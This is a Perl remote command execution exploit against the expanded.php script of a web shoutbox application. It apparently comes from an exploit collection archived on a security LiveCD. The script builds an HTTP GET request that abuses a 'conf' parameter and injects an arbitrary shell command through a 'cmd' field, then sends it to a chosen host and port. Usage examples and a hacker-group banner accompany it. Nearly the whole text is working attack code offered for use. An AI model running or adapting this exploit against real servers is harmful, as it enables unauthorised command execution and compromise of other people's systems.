home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / webfrontShoutbox / expanded.pl < prev    next >
Text File  |  2005-02-12  |  2KB  |  73 lines
  1. #-------------------------------------------------------------------------
  2. #
  3. # expanded.php remote command execution Xploit
  4. #
  5. # Coded By _6mO_HaCk
  6. #
  7. # The Hackology Team
  8. #
  9. # Usage = perl expanded.pl <target> <port> <command>
  10. #
  11. # exp   = perl expanded.pl 127.0.0.1 80 ls
  12. #       = perl expanded.pl localhost 80 touch+/tmp/owned
  13.  
  14. use IO::Socket;
  15. use strict;
  16.  
  17. system(clear);
  18. print "------------------------------------------\n";
  19. print "--- expanded.php remote cmd execution  ---\n";
  20. print "---              Xploit                ---\n";
  21. print "---                                    ---\n";
  22. print "---         Coded By _6mO_HaCk         ---\n";
  23. print "---                                    ---\n";
  24. print "--- Greetz to : effbeeye, D|NOOO       ---\n";
  25. print "---             Thom4sss, DeV|L0Ty     ---\n";
  26. print "---             MajNouN, |BiG-LuV|     ---\n";
  27. print "---                                    ---\n";
  28. print "---         The Hackology Team         ---\n";
  29. print "------------------------------------------\n";
  30.  
  31. if(!defined($ARGV[0] && $ARGV[1] && $ARGV[2]))
  32. {
  33.    &usage;
  34. }
  35. my $host     = $ARGV[0];
  36. my $port     = $ARGV[1];
  37. my $cmd      = $ARGV[2];
  38.  
  39. my $conf     ="/tmp/.xploit";
  40. my $sbdir    ="/shoutbox"; # define this to ur shoutbox dir if different
  41. my $target   ="expanded.php?conf=";
  42. my $Xploit   = "GET ${sbdir}/${target}${conf}&cmd=$cmd HTTP/1.1\nHost: 
  43. $host\nConnection: Close\n\n";
  44.  
  45. my $tcpval   = getprotobyname('tcp');
  46. my $serverIP = inet_aton($host);
  47. my $serverAddr = sockaddr_in($ARGV[1], $serverIP);
  48. my $protocol_name = "tcp";
  49.  
  50. my $ia       = inet_aton($host)        || die ("[-] Unable to resolve 
  51. $host");
  52. my $pa       = sockaddr_in($port, $ia)     || die ("[-] Unkown error");
  53. my $proto    = getprotobyname('tcp')       || die ("[-] Unable to get 
  54. protocol");
  55. socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die ("[-] Unable to open 
  56. socket");
  57. connect(SOCK, $pa)                || die ("[-] Unable to connect 
  58. to $host:$port");
  59.  
  60. print "[*] Executing $cmd on $host:$port ...\n";
  61. sleep(2);
  62.  
  63. my $submit   = "$Xploit";   
  64. send(SOCK,$submit,0);
  65. close(SOCK);
  66.  
  67. sub usage {die("\n\n[*] Usage : perl $0 <TargetIP> <TargetPort> 
  68. <CmdToRun>\n\n");}
  69. print "\n";
  70. print "\n[+] Command should be successfully executed\n";
  71.  
  72. #-------------------------------------------------------------------------
  73.